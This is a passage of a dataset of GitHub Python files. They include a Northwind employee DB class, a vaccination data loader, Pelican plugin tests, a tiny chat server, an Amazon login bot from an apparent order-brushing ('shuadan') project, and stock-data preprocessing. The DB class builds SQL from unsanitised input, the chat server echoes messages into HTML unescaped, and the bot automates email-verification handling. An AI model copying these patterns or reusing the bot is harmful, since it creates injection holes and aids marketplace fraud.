Pacotes/scriptARGS.py","file_name":"scriptARGS.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"pt","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"70423124266","text":"from db_connect_oop import *\n # employees_table = NWEmployees()\n\nclass NWEmployees(MSDBConnection):\n\n def __sql_query(self, sql_query): # Makes it private\n return self.cursor.execute(sql_query)\n\n# Get all employee data\n def emp_read_all(self):\n query = \"SELECT * FROM Employees\"\n data = self.__sql_query(query)\n return data\n\n# Get one employee by id\n def emp_read_one(self, id):\n query = f\"SELECT * FROM Employees WHERE EmployeeID = {id}\"\n data = self.__sql_query(query)\n return data\n\n# Search for one employee by name or LastName\n def search_emp_by_name(self, last_name):\n query = f\"SELECT * FROM Employees WHERE LastName LIKE '%{last_name}%'\"\n data = self.__sql_query(query)\n while True:\n row = data.fetchone()\n if row is None:\n break\n print(f\"ID: {row.EmployeeID} // {row.TitleOfCourtesy} {row.FirstName} {row.LastName} - {row.Title} // Address: {row.Address} {row.PostalCode}, {row.City} // Phone: {row.HomePhone} // DOB: {row.BirthDate}\")\n\n # create an employee\n def create_employee(self, first_name, last_name):\n query = f\"INSERT INTO Employees (FirstName, LastName) VALUES ('{first_name}', '{last_name}')\"\n data_to_insert = self.__sql_query(query)\n self.docker_Northwind.commit()\n return data_to_insert\n\n\n# Add all this funtionality to our run products while loop\n\n# employee = NWEmployees().emp_read_one(4)\n# print(employee.fetchone())\n\n# employee = NWEmployees().search_emp_by_name('Fuller')\n","repo_name":"Daniel-Chow-YC/eng-48-pyodbc-connection","sub_path":"db_employees_oop.py","file_name":"db_employees_oop.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70575400106","text":"import sqlite3\r\nfrom os.path import exists\r\nimport os\r\n#You can always get the latest update from the link below and make sure to put the cvl file in the same directory\r\n#https://www.kaggle.com/gpreda/covid-world-vaccination-progress\r\n\r\ndef parsenumber(number) :\r\n number=str(number)\r\n number=number.split('.')[0].strip()\r\n number=list(number)\r\n out=number\r\n last3=[]\r\n while len(number)>3 :\r\n last3=number[-3:]+last3\r\n last3.insert(0,',')\r\n del number[-3:]\r\n out=number+last3\r\n return listtostr(out)\r\n\r\ndef listtostr(list) :\r\n str=''\r\n for element in list :\r\n str+=element\r\n return str\r\n\r\n\r\ndef parsedata(cline) :\r\n date=cline[2]\r\n vaccinated=parsenumber(cline[4])\r\n f_vaccinated=parsenumber(cline[5])\r\n dv=parsenumber(cline[6])\r\n vaccinated_ph=cline[9]\r\n f_vaccinated_ph=cline[10]\r\n vaccine=cline[12]\r\n if cline[12].startswith('\"') : #countries which have several vaccines\r\n sindex=13\r\n while True:\r\n text=cline[sindex]\r\n vaccine=vaccine+text\r\n if text.endswith('\"') :\r\n source_name=cline[sindex+1]\r\n break\r\n else :\r\n sindex+=1\r\n else :\r\n source_name=cline[13]\r\n\r\n global k_vaccinated\r\n global k_f_vaccinated\r\n global k_vaccinated_ph\r\n global k_f_vaccinated_ph\r\n\r\n #keep the latest data if country doesn't publish new data\r\n if len(vaccinated)<1 :\r\n vaccinated=k_vaccinated\r\n else :\r\n k_vaccinated=vaccinated\r\n\r\n if len(f_vaccinated)<1 :\r\n f_vaccinated=k_f_vaccinated\r\n else :\r\n k_f_vaccinated=f_vaccinated\r\n\r\n if len(dv) < 1 : dv=None\r\n\r\n if len(vaccinated_ph)<1 :\r\n vaccinated_ph=k_vaccinated_ph\r\n else :\r\n k_vaccinated_ph=vaccinated_ph\r\n\r\n if len(f_vaccinated_ph)<1 :\r\n f_vaccinated_ph=k_f_vaccinated_ph\r\n else :\r\n k_f_vaccinated_ph=f_vaccinated_ph\r\n\r\n return (date,vaccinated,f_vaccinated,dv,vaccinated_ph,f_vaccinated_ph,vaccine,source_name)\r\n\r\n#if exists('vaccination_data.sqlite') : os.remove('vaccination_data.sqlite')\r\nconn=sqlite3.connect('vaccination_data.sqlite')\r\ncur=conn.cursor()\r\n\r\ncur.executescript('''\r\n DROP TABLE IF EXISTS Vaccine;\r\n DROP TABLE IF EXISTS Daily;\r\n\r\n CREATE TABLE IF NOT EXISTS Vaccine(\r\n id INTEGER PRIMARY KEY AUTOINCREMENT,\r\n Country TEXT UNIQUE,\r\n Vaccines TEXT,\r\n Source TEXT\r\n );\r\n CREATE TABLE IF NOT EXISTS Daily(\r\n Country_id INTEGER,\r\n Vaccinated REAL,\r\n Fully_Vaccinated REAL,\r\n Daily_Vaccinated REAL,\r\n \"Vaccinated(%)\" REAL,\r\n \"Fully_Vaccinated(%)\" REAL,\r\n Date TEXT\r\n );\r\n CREATE TABLE IF NOT EXISTS Geodata(\r\n Country_id INTEGER,\r\n geo TEXT NULL\r\n )''')\r\n\r\nhandle=open('country_vaccinations.csv')\r\nlinelist=list()\r\n\r\nk_vaccinated=None\r\nk_f_vaccinated=None\r\nk_vaccinated_ph=None\r\nk_f_vaccinated_ph=None\r\n\r\n\r\nfor line in handle :\r\n linelist.append(line)\r\n\r\nfirstline=True #first line realted to a country\r\ncount=0\r\nfor i in range(len(linelist)) :\r\n count+=1\r\n if i == 0 : continue #omitting the first line\r\n infos=linelist[i].split(',')\r\n if firstline :\r\n country=infos[0]\r\n print('Retrieving data related to: ',country)\r\n cur.execute('INSERT INTO Vaccine (Country) VALUES (?)',(country,))\r\n cur.execute('SELECT id FROM Vaccine WHERE Country=?',(country,))\r\n country_id=cur.fetchone()[0]\r\n datas=parsedata(infos)\r\n (date,vaccinated,f_vaccinated,dv,vaccinated_ph,f_vaccinated_ph,vaccine,source_name)=datas\r\n cur.execute('''\r\n INSERT INTO Daily (Country_id,Vaccinated,Fully_Vaccinated,Daily_Vaccinated,\"Vaccinated(%)\",\"Fully_Vaccinated(%)\",Date) VALUES\r\n (?,?,?,?,?,?,?)''',(country_id,vaccinated,f_vaccinated,dv,vaccinated_ph,f_vaccinated_ph,date))\r\n firstline=False\r\n try :\r\n if linelist[i+1].startswith(country) : #not the last line for a country\r\n datas=parsedata(infos)\r\n (date,vaccinated,f_vaccinated,dv,vaccinated_ph,f_vaccinated_ph,vaccine,source_name)=datas\r\n cur.execute('''\r\n INSERT INTO Daily (Country_id,Vaccinated,Fully_Vaccinated,Daily_Vaccinated,\"Vaccinated(%)\",\"Fully_Vaccinated(%)\",Date) VALUES\r\n (?,?,?,?,?,?,?)''',(country_id,vaccinated,f_vaccinated,dv,vaccinated_ph,f_vaccinated_ph,date))\r\n\r\n else : #the last line of the csv file\r\n raise IndexError\r\n except IndexError :\r\n firstline=True\r\n\r\n datas=parsedata(infos)\r\n (date,vaccinated,f_vaccinated,dv,vaccinated_ph,f_vaccinated_ph,vaccine,source_name)=datas\r\n\r\n cur.execute('''\r\n INSERT INTO Daily (Country_id,Vaccinated,Fully_Vaccinated,Daily_Vaccinated,\"Vaccinated(%)\",\"Fully_Vaccinated(%)\",Date) VALUES\r\n (?,?,?,?,?,?,?)''',(country_id,vaccinated,f_vaccinated,dv,vaccinated_ph,f_vaccinated_ph,date))\r\n\r\n cur.execute('UPDATE Vaccine SET Vaccines=? , Source=? WHERE id=?',(vaccine,source_name,country_id))\r\n\r\n k_vaccinated=None\r\n k_f_vaccinated=None\r\n k_vaccinated_ph=None\r\n k_f_vaccinated_ph=None\r\n\r\n if count%50==0 : conn.commit()\r\nconn.commit()\r\nprint('Finished with getting data from csv file, run geoload.py to fill up geodata column.')\r\n\r\n#you can run the command below in your sqlite browser if you want\r\n\r\n#SELECT Vaccine.Country,Daily.Vaccinated,Daily.Fully_Vaccinated,Daily.\"Vaccinated(%)\",Daily.\"Fully_Vaccinated(%)\",max(Date),Vaccine.Vaccines\r\n#FROM Vaccine JOIN Daily ON Vaccine.id=Daily.Country_id\r\n#GROUP BY Country_id\r\n#ORDER BY \"Fully_Vaccinated(%)\" DESC\r\n","repo_name":"amirrezamsh/covid-19","sub_path":"vaccine_database.py","file_name":"vaccine_database.py","file_ext":"py","file_size_in_byte":5791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36413845030","text":"'''Unit tests for the i18n_subsites plugin'''\n\nimport os\nimport locale\nimport unittest\nimport subprocess\nfrom tempfile import mkdtemp\nfrom shutil import rmtree\n\nfrom . import i18n_subsites as i18ns\nfrom pelican import Pelican\nfrom pelican.tests.support import get_settings\nfrom pelican.settings import read_settings\n\n\nclass TestTemporaryLocale(unittest.TestCase):\n '''Test the temporary locale context manager'''\n\n def test_locale_restored(self):\n '''Test that the locale is restored after exiting context'''\n orig_locale = locale.setlocale(locale.LC_ALL)\n with i18ns.temporary_locale():\n locale.setlocale(locale.LC_ALL, 'C')\n self.assertEqual(locale.setlocale(locale.LC_ALL), 'C')\n self.assertEqual(locale.setlocale(locale.LC_ALL), orig_locale)\n\n def test_temp_locale_set(self):\n '''Test that the temporary locale is set'''\n with i18ns.temporary_locale('C'):\n self.assertEqual(locale.setlocale(locale.LC_ALL), 'C')\n\n\nclass TestSettingsManipulation(unittest.TestCase):\n '''Test operations on settings dict'''\n\n def setUp(self):\n '''Prepare default settings'''\n self.settings = get_settings()\n\n def test_get_pelican_cls_class(self):\n '''Test that we get class given as an object'''\n self.settings['PELICAN_CLASS'] = object\n cls = i18ns.get_pelican_cls(self.settings)\n self.assertIs(cls, object)\n \n def test_get_pelican_cls_str(self):\n '''Test that we get correct class given by string'''\n cls = i18ns.get_pelican_cls(self.settings)\n self.assertIs(cls, Pelican)\n \n\nclass TestSitesRelpath(unittest.TestCase):\n '''Test relative path between sites generation'''\n\n def setUp(self):\n '''Generate some sample siteurls'''\n self.siteurl = 'http://example.com'\n i18ns._SITE_DB['en'] = self.siteurl\n i18ns._SITE_DB['de'] = self.siteurl + '/de'\n\n def tearDown(self):\n '''Remove sites from db'''\n i18ns._SITE_DB.clear()\n\n def test_get_site_path(self):\n '''Test getting the path within a site'''\n self.assertEqual(i18ns.get_site_path(self.siteurl), '/')\n self.assertEqual(i18ns.get_site_path(self.siteurl + '/de'), '/de')\n\n def test_relpath_to_site(self):\n '''Test getting relative paths between sites'''\n self.assertEqual(i18ns.relpath_to_site('en', 'de'), 'de')\n self.assertEqual(i18ns.relpath_to_site('de', 'en'), '..')\n\n \nclass TestRegistration(unittest.TestCase):\n '''Test plugin registration'''\n\n def test_return_on_missing_signal(self):\n '''Test return on missing required signal'''\n i18ns._SIGNAL_HANDLERS_DB['tmp_sig'] = None\n i18ns.register()\n self.assertNotIn(id(i18ns.save_generator),\n i18ns.signals.generator_init.receivers)\n\n def test_registration(self):\n '''Test registration of all signal handlers'''\n i18ns.register()\n for sig_name, handler in i18ns._SIGNAL_HANDLERS_DB.items():\n sig = getattr(i18ns.signals, sig_name)\n self.assertIn(id(handler), sig.receivers)\n # clean up\n sig.disconnect(handler)\n \n\nclass TestFullRun(unittest.TestCase):\n '''Test running Pelican with the Plugin'''\n\n def setUp(self):\n '''Create temporary output and cache folders'''\n self.temp_path = mkdtemp(prefix='pelicantests.')\n self.temp_cache = mkdtemp(prefix='pelican_cache.')\n\n def tearDown(self):\n '''Remove output and cache folders'''\n rmtree(self.temp_path)\n rmtree(self.temp_cache)\n\n def test_sites_generation(self):\n '''Test generation of sites with the plugin\n\n Compare with recorded output via ``git diff``.\n To generate output for comparison run the command\n ``pelican -o test_data/output -s test_data/pelicanconf.py \\\n test_data/content``\n Remember to remove the output/ folder before that.\n '''\n base_path = os.path.dirname(os.path.abspath(__file__))\n base_path = os.path.join(base_path, 'test_data')\n content_path = os.path.join(base_path, 'content')\n output_path = os.path.join(base_path, 'output')\n settings_path = os.path.join(base_path, 'pelicanconf.py')\n settings = read_settings(path=settings_path, override={\n 'PATH': content_path,\n 'OUTPUT_PATH': self.temp_path,\n 'CACHE_PATH': self.temp_cache,\n 'PLUGINS': [i18ns],\n }\n )\n pelican = Pelican(settings)\n pelican.run()\n\n # compare output\n out, err = subprocess.Popen(\n ['git', 'diff', '--no-ext-diff', '--exit-code', '-w', output_path,\n self.temp_path], env={'PAGER': ''},\n stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()\n self.assertFalse(out, 'non-empty `diff` stdout:\\n{}'.format(out))\n self.assertFalse(err, 'non-empty `diff` stderr:\\n{}'.format(err))\n","repo_name":"getpelican/pelican-plugins","sub_path":"i18n_subsites/test_i18n_subsites.py","file_name":"test_i18n_subsites.py","file_ext":"py","file_size_in_byte":5011,"program_lang":"python","lang":"en","doc_type":"code","stars":1367,"dataset":"github-code","pt":"37"} +{"seq_id":"40866962485","text":"def count_paths_with_obstacles(m, n, obstacles):\n # Create a 2D array to store the number of paths to each point\n dp = [[0] * (n + 1) for _ in range(m + 1)]\n\n # Initialize the starting point\n dp[0][0] = 1\n\n # Mark obstacles\n for obstacle in obstacles:\n if obstacle[0] <= m and obstacle[1] <= n:\n dp[obstacle[0]][obstacle[1]] = -1\n\n # Update the number of paths for each point\n for i in range(m + 1):\n for j in range(n + 1):\n if dp[i][j] != -1:\n if i > 0 and dp[i - 1][j] != -1:\n dp[i][j] += dp[i - 1][j]\n if j > 0 and dp[i][j - 1] != -1:\n dp[i][j] += dp[i][j - 1]\n\n # Return the number of paths to the bottom-right corner\n return dp[m][n]\n\n# Define the grid size\nm, n = 18, 19 # Adjusted grid size to cover all obstacle points\n\n# Define the obstacles\nobstacles = [(1, 3), (3, 3), (3, 6), (4, 3), (6, 4), (6, 6), (14, 12)]\n\n# Check the given statements\nstatements = [\n (1, 1, 2),\n (2, 3, 7),\n (5, 5, 51),\n (6, 7, 115),\n (8, 7, 736),\n (7, 8, 551),\n (13, 12, 883023),\n (15, 16, 37963602),\n (17, 18, 592095012)\n]\n\nfor statement in statements:\n x, y, expected_paths = statement\n actual_paths = count_paths_with_obstacles(x, y, obstacles)\n is_true = actual_paths == expected_paths\n print(f\"There are {actual_paths} paths to ({x},{y}): {is_true}\")\n","repo_name":"nurlanyagublu/Modelling-Seminar","sub_path":"Compression of IP forwarding tables Practice/def count_paths_with_obstacles(m, n, obs.py","file_name":"def count_paths_with_obstacles(m, n, obs.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26227769882","text":"import http.server\nimport urllib.parse\nimport uuid\nimport datetime\nimport argparse\n\n\nclass ChatHandler(http.server.BaseHTTPRequestHandler):\n messages = []\n\n def write_response(self):\n messages = [\n \"\"\"\n
\n {received}\n {name}\n {message}\n
\n \"\"\".format_map(\n {**f, \"received\": t}\n )\n for f, t in self.messages\n ]\n message_log = \"\\n\".join(messages)\n contents = f\"\"\"\n\n\n\n\n\n
\n { message_log }\n
\n\n
\n \n \n \n
\n\n \"\"\"\n response = \"\\n\".join(\n [\"HTTP/1.1 200 OK\", \"Content-type: text/html\", \"\", contents]\n )\n self.wfile.write(response.encode())\n\n def parse_form(self, content):\n raw_items = [l.split(\"=\", 1) for l in content.split(\"&\")]\n items = [\n (urllib.parse.unquote_plus(k), urllib.parse.unquote_plus(v))\n for (k, v) in raw_items\n ]\n return dict(items)\n\n def handle_message(self, message):\n if not self.messages or message != self.messages[-1][0]:\n self.messages.append((message, datetime.datetime.now().time()))\n\n def do_GET(self):\n self.write_response()\n\n def do_POST(self):\n n_bytes = int(self.headers[\"Content-Length\"])\n form_data = self.rfile.read(n_bytes).decode()\n form = self.parse_form(form_data)\n\n self.handle_message(form)\n self.write_response()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"host\", default=\"0.0.0.0\")\n parser.add_argument(\"port\", default=8000, type=int)\n args = parser.parse_args()\n\n server = http.server.HTTPServer((args.host, args.port), ChatHandler)\n print(f\"Serving on http://{args.host}:{args.port}\")\n server.serve_forever()\n","repo_name":"agoose77/wingpings","sub_path":"wingpings.py","file_name":"wingpings.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70576474987","text":"from bs4 import BeautifulSoup as bs\nfrom pprint import pprint\nimport requests\nimport csv\n\ndaum_url = 'https://www.daum.net/'\n\nresponse = requests.get(daum_url).text\n# print(response)\ndata = bs(response, 'html.parser')\n# print(data)\n\nrankings = data.select('#mArticle > div.cmain_tmp > div.section_media > div.hot_issue.issue_mini > div.hotissue_mini > ol > li> div > div > span.txt_issue > a')\n# print(rankings)\n\nranking_dict = {}\nranking_list = []\n\nfor idx, ranking in enumerate(rankings, start=1):\n # print(f'{idx}위 : {ranking.text}')\n # ranking_dict[f'{idx}위'] = ranking.text\n ranking_dict = {'rank': f'{idx}위', 'ranker': ranking.text}\n ranking_list.append(ranking_dict)\n\n# pprint(ranking_list)\n\nwith open('daum_rank.csv', 'w', encoding='utf-8', newline='') as csvfile:\n # csv_writer = csv.writer(csvfile)\n #1. 저장할 데이터의 필드 이름을 미리 지정한다. \n fieldnames = ('rank', 'ranker')\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n\n #2. 필드 이름을 csv 최상단에 작성한다.\n writer.writeheader()\n\n for ranking in ranking_list:\n # ranking -> dict\n writer.writerow(ranking)","repo_name":"lymchgmk/Algorithm-Problem-Solving","sub_path":"SSAFY/Python_lecture/lectures-justin-master/Python/file_operations/daum_rankings.py","file_name":"daum_rankings.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36472497697","text":"#coding=utf-8\r\nimport sys\r\nimport browser as bo\r\nimport time\r\nfrom util import CidTransfer\r\nfrom db.SQLModel import Record2DB\r\nfrom logs.log import Logger\r\nfrom mail_auth.mailauth_handler import MailServer\r\nreload(sys)\r\nsys.setdefaultencoding('utf-8')\r\nL = Logger(__file__)\r\nRdb = Record2DB()\r\n\r\n\r\nclass Login(object):\r\n def __init__(self, driver, conf):\r\n self.d = driver\r\n self.conf = conf\r\n self.url = 'https://' + CidTransfer(conf.cid).value\r\n\r\n\r\n def login_with_cookie(self):\r\n self.d.request(self.url)\r\n self.d.to_first_handler()\r\n self.d.delete_cookies()\r\n if self.addCookies():\r\n self.d.refresh_page()\r\n if self.conf.cid in (2, 5):\r\n user_xpath = '//a[@id=\"nav-link-yourAccount\"]/span[contains(text(), \"%s\")]' % self.conf.name\r\n elif self.conf.cid in (1, 3, 4, 6, 7, 8):\r\n user_xpath = '//a[@id=\"nav-link-accountList\"]/span[contains(text(), \"%s\")]' % self.conf.name\r\n else:\r\n user_xpath = ''\r\n L.error('Wrong params \"contry id\": %s' % self.conf.cid)\r\n if self.d.is_element_exist(user_xpath):\r\n L.info('带cookie账号登录成功')\r\n Rdb.insert_log(self.conf.task_guid, self.conf.user, '账号登录', '带cookie登录成功')\r\n bo.update_cookie_to_db(self.d, self.conf.task_guid, self.conf.user, '账号登录')\r\n return True\r\n else:\r\n Rdb.insert_log(self.conf.task_guid, self.conf.user, '账号登录', '带cookie登录失败')\r\n L.error('带cookie账号登录失败')\r\n return False\r\n else:\r\n L.error(' cookie添加失败, 代理网速太慢')\r\n Rdb.insert_log(self.conf.task_guid, self.conf.user, '账号登录', '登录失败, 代理网速太慢')\r\n return False\r\n\r\n def login_by_click(self):\r\n login_xpath = str()\r\n if self.conf.cid in (2, 5):\r\n login_xpath = '//a[@id=\"nav-link-yourAccount\"]'\r\n elif self.conf.cid in (1, 3, 4, 6, 7, 8):\r\n login_xpath = '//a[@id=\"nav-link-accountList\"]'\r\n u_xpath = '//input[@id=\"ap_email\"]'\r\n p_xpath = '//input[@id=\"ap_password\"]'\r\n ctn = '//input[@id=\"continue\"]'\r\n sub_xpath = '//input[@id=\"signInSubmit\"]'\r\n self.d.request(self.url)\r\n self.d.to_first_handler()\r\n # self.d.delete_cookies()\r\n # self.addCookies()\r\n self.d.wait_clickable(login_xpath)\r\n self.d.rand_move()\r\n self.d.click_opt(login_xpath)\r\n if not self.d.is_element_exist(u_xpath) and self.d.is_element_exist(p_xpath):\r\n self.d.wait_clickable(sub_xpath)\r\n self.d.send_key(p_xpath, self.conf.pw)\r\n self.d.click_opt(sub_xpath)\r\n else:\r\n self.d.wait(u_xpath)\r\n self.d.send_key(u_xpath, self.conf.user)\r\n if self.d.is_element_exist(p_xpath):\r\n self.d.wait_clickable(sub_xpath)\r\n self.d.send_key(p_xpath, self.conf.pw)\r\n self.d.click_opt(sub_xpath)\r\n else:\r\n self.d.wait_clickable(ctn)\r\n self.d.click_opt(ctn)\r\n self.d.wait(p_xpath)\r\n self.d.wait_clickable(sub_xpath)\r\n self.d.send_key(p_xpath, self.conf.pw)\r\n self.d.click_opt(sub_xpath)\r\n # for i in range(50):\r\n # time.sleep(1)\r\n # print i\r\n # 判断是否登录成功,如果成功则保存cookies\r\n if self.d.is_element_exist('//input[@id=\"continue\"]'):\r\n L.error(' 登录失败, 要验证码或邮箱验证')\r\n Rdb.insert_log(self.conf.task_guid, self.conf.user, '账号登录', '登录失败, 要验证码或邮箱验证')\r\n if self.check_mail_auth():\r\n auth = self.get_auth()\r\n if auth:\r\n if self.input_auth(auth):\r\n bo.update_cookie_to_db(self.d, self.conf.task_guid, self.conf.user, '账号登录')\r\n Rdb.insert_log(self.conf.task_guid, self.conf.user, '账号登录', '邮箱验证登录成功')\r\n return True\r\n else:\r\n L.error('邮箱验证码提交失败')\r\n Rdb.insert_log(self.conf.task_guid, self.conf.user, '账号登录', '邮箱验证码提交失败')\r\n return False\r\n else:\r\n L.error('未从邮箱获取到验证码')\r\n Rdb.insert_log(self.conf.task_guid, self.conf.user, '账号登录', '未从邮箱提取到验证码')\r\n return False\r\n else:\r\n L.error('需要手动验证码或者账号可能被封,请检查')\r\n Rdb.insert_log(self.conf.task_guid, self.conf.user, '账号登录', '需要手动验证码或者账号可能被封,请检查')\r\n return False\r\n else:\r\n bo.update_cookie_to_db(self.d, self.conf.task_guid, self.conf.user, '账号登录')\r\n Rdb.insert_log(self.conf.task_guid, self.conf.user, '账号登录', '登录成功')\r\n return True\r\n\r\n def addCookies(self):\r\n try:\r\n table = 'account_cookies'\r\n field = ['cookies']\r\n where = \"account='%s'\" % self.conf.user\r\n ck = Rdb.search_(table, field, where)\r\n if len(ck):\r\n cookie = ck[0][0].replace(\"´\", \"'\")\r\n # print type(eval(cookie)), eval(cookie)\r\n if self.d.add_cookies_to_bs(eval(cookie)):\r\n L.info('浏览器cookie设置成功')\r\n Rdb.insert_log(self.conf.task_guid, self.conf.user, '账号登录', '浏览器Cookie 设置成功')\r\n return True\r\n else:\r\n L.info('浏览器cookie设置成功')\r\n Rdb.insert_log(self.conf.task_guid, self.conf.user, '账号登录', '浏览器Cookie 设置超时导致失败')\r\n return False\r\n else:\r\n L.error(\"未找到账号%s登录的cookie\" % self.conf.user)\r\n Rdb.insert_log(self.conf.task_guid, self.conf.user, '账号登录', '浏览器Cookie 设置失败,Cookie没查到')\r\n return False\r\n except:\r\n L.exc('浏览器Cookie设置失败')\r\n Rdb.insert_log(self.conf.task_guid, self.conf.user, '账号登录', '浏览器Cookie 设置失败(请检查操作节点)')\r\n return False\r\n\r\n def check_mail_auth(self):\r\n h1_xp = '//h1[contains(text(), \"Verification needed\")]'\r\n if self.d.get_elem_counts(h1_xp) > 0:\r\n return True\r\n return False\r\n\r\n def send_auth_to_mail(self):\r\n send_xp = '//input[@id=\"continue\"]'\r\n self.d.click_opt(send_xp)\r\n\r\n def get_auth(self):\r\n mail_handler = MailServer(self.conf.user, self.conf.pw,\r\n self.conf.host, self.conf.port)\r\n if mail_handler.conn:\r\n origin_len = mail_handler.email_counts()\r\n L.debug('origin_len:' + origin_len)\r\n mail_handler.close_server()\r\n self.send_auth_to_mail()\r\n for i in range(self.conf.wait_mail):\r\n L.info('剩余时间:%s(s)' % ((self.conf.wait_mail-i)*10))\r\n time.sleep(10)\r\n\r\n mail_handler = MailServer(self.conf.user, self.conf.pw,\r\n self.conf.host, self.conf.port)\r\n if mail_handler.conn:\r\n cur_len = mail_handler.email_counts()\r\n if cur_len - origin_len > 0:\r\n con = mail_handler.parse_mail(cur_len)\r\n authcode = mail_handler.abstract_authcode(con)\r\n mail_handler.close_server()\r\n if authcode:\r\n L.debug('auth code:' + authcode)\r\n return authcode\r\n else:\r\n L.error('验证码提取失败')\r\n else:\r\n L.error('还没获取到新邮件')\r\n else:\r\n L.error('邮箱第%s次链接失败' % (i+1))\r\n else:\r\n L.error('邮箱链接失败')\r\n\r\n def input_auth(self, auth):\r\n h1_xp = '''//h1[contains(text(), \"Verifying it's you\")]'''\r\n ctn_xp = '//input[@aria-labelledby=\"a-autoid-0-announce\"]'\r\n code_xp = '//input[@name=\"code\"]'\r\n if self.d.get_elem_counts(h1_xp) > 0:\r\n self.d.send_key(code_xp, auth)\r\n self.d.click_opt(ctn_xp)\r\n return True\r\n return False\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n pass\r\n\r\n","repo_name":"siladi55/selenium-project","sub_path":"AMZ_shuadan/functions/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":8888,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"38642633674","text":"import pandas as pd\nfrom keras62_split2 import spli\nimport numpy as np\nfrom sklearn.preprocessing import MinMaxScaler\n\nsize = 5\n\nsamsung =pd.read_csv('./data/csv/삼성전자 1120.csv', encoding='CP949', header=0)\nsamsung = samsung.sort_values(['일자'], ascending=['True'])\n\nfor i in range(len(samsung.index)):\n #일자\n samsung.iloc[i,0] = int(samsung.iloc[i,0].replace(\"/\",\"\"))\n #시가\n for j in range(1,17):\n if type(samsung.iloc[i,j]) == type('') and j !=5:\n samsung.iloc[i,j] = float(samsung.iloc[i,j].replace(\",\",\"\"))\n\nbit =pd.read_csv('./data/csv/비트컴퓨터 1120.csv', encoding='CP949')\nbit = bit.sort_values(['일자'], ascending=['True'])\n\nfor i in range(len(bit.index)):\n #일자\n bit.iloc[i,0] = int(bit.iloc[i,0].replace(\"/\",\"\"))\n for j in range(1,17):\n if type(bit.iloc[i,j]) == type('') and j !=5:\n bit.iloc[i,j] = float(bit.iloc[i,j].replace(\",\",\"\"))\n\n\n################################삼성 비트 끝\nkosdak =pd.read_csv('./data/csv/코스닥.csv', encoding='CP949', header=0)\nkosdak = kosdak.sort_values(['일자'], ascending=['True'])\n\nfor i in range(len(kosdak.index)):\n kosdak.iloc[i,0] = int(kosdak.iloc[i,0].replace(\"/\",\"\"))\n for j in range(1,15):\n if type(kosdak.iloc[i,j]) == type('') and j !=5:\n kosdak.iloc[i,j] = float(kosdak.iloc[i,j].replace(\",\",\"\"))\n\n#######삼성, 비트 floateger로 파싱 끝\n\ngold =pd.read_csv('./data/csv/금현물.csv', encoding='CP949', header=0)\ngold = gold.sort_values(['일자'], ascending=['True'])\n\nfor i in range(len(gold.index)):\n gold.iloc[i,0] = int(gold.iloc[i,0].replace(\"/\",\"\"))\n for j in range(1,13):\n if type(gold.iloc[i,j]) == type('') and j !=5:\n if j == 7:\n gold.iloc[i,j] = gold.iloc[i,j].replace(\"%\",\",\")\n gold.iloc[i,j] = float(gold.iloc[i,j].replace(\",\",\"\"))\n else:\n gold.iloc[i,j] = float(gold.iloc[i,j].replace(\",\",\"\"))\n\n\nprint(gold)\nis_samsung = samsung['일자'] > 20180504\nis_bit = bit['일자'] > 20180504\nis_kosdak = kosdak['일자'] >20180508\nis_gold = kosdak['일자'] >20180508\nbit = bit[is_bit]\n\nsamsung = samsung[is_samsung]\nbit = bit[is_bit]\nkosdak = kosdak[is_kosdak]\ngold = gold[is_gold]\n\nis_samsung = samsung['일자'] != 20201120 #20일 빼기\nis_bit = bit['일자'] != 20201120 #20일 빼기\n\nsamsung = samsung[is_samsung]\nbit = bit[is_bit]\n\nprint(samsung.shape) #(625, 17)\nprint(bit.shape) #(625, 17)\nprint(kosdak.shape)# (625, 15)\nprint(gold.shape) # (625, 13)\n\n#### str -> float 완 컬럼 파싱 시작\n\nsamsung = samsung['시가 고가 저가 종가 등락률 개인 기관 외국계'.split()] #8개 컬럼\nbit = bit['시가 고가 저가 종가'.split()] # 4개 컬럼\nkosdak = kosdak['시가 고가 저가 현재가 상승 보합 하락'.split()] #7개 컬럼\ngold = gold['시가 고가 저가 종가 개인 외국인'.split()] #6개 컬럼\n\ny_samsung = samsung.values[5:, 0] #5번 째 이후 시작가 모두 #50200.0\nscaler = MinMaxScaler()\n\nscaler.fit(samsung)\nsamsung = scaler.transform(samsung)\n\nscaler.fit(bit)\nbit = scaler.transform(bit)\n\nscaler.fit(kosdak)\nkosdak = scaler.transform(kosdak)\n\nscaler.fit(gold)\ngold = scaler.transform(gold)\n\nx_samsung =spli(samsung, 5)\nx_bit =spli(bit, 5)\nx_kosdak=spli(kosdak, 5)\nx_gold=spli(gold, 5)\n\nx_samsung = x_samsung.astype('float32')\ny_samsung = y_samsung.astype('float32')\nx_bit = x_bit.astype('float32')\nx_kosdak = x_kosdak.astype('float32')\nx_gold = x_gold.astype('float32')\n\n# print(x_gold[0])\n# print(y_samsung[0])\n# print(x_bit[0])\n# print(x_kosdak[0])\n# print(x_gold[0]) 전부 숫자임\n\nnp.save('./homework/samsung_2_startprice/x_samsung.npy', arr= x_samsung)\nnp.save('./homework/samsung_2_startprice/y_samsung.npy', arr= y_samsung)\nnp.save('./homework/samsung_2_startprice/x_bit.npy', arr= x_bit)\nnp.save('./homework/samsung_2_startprice/x_kosdak.npy', arr= x_kosdak)\nnp.save('./homework/samsung_2_startprice/x_gold.npy', arr= 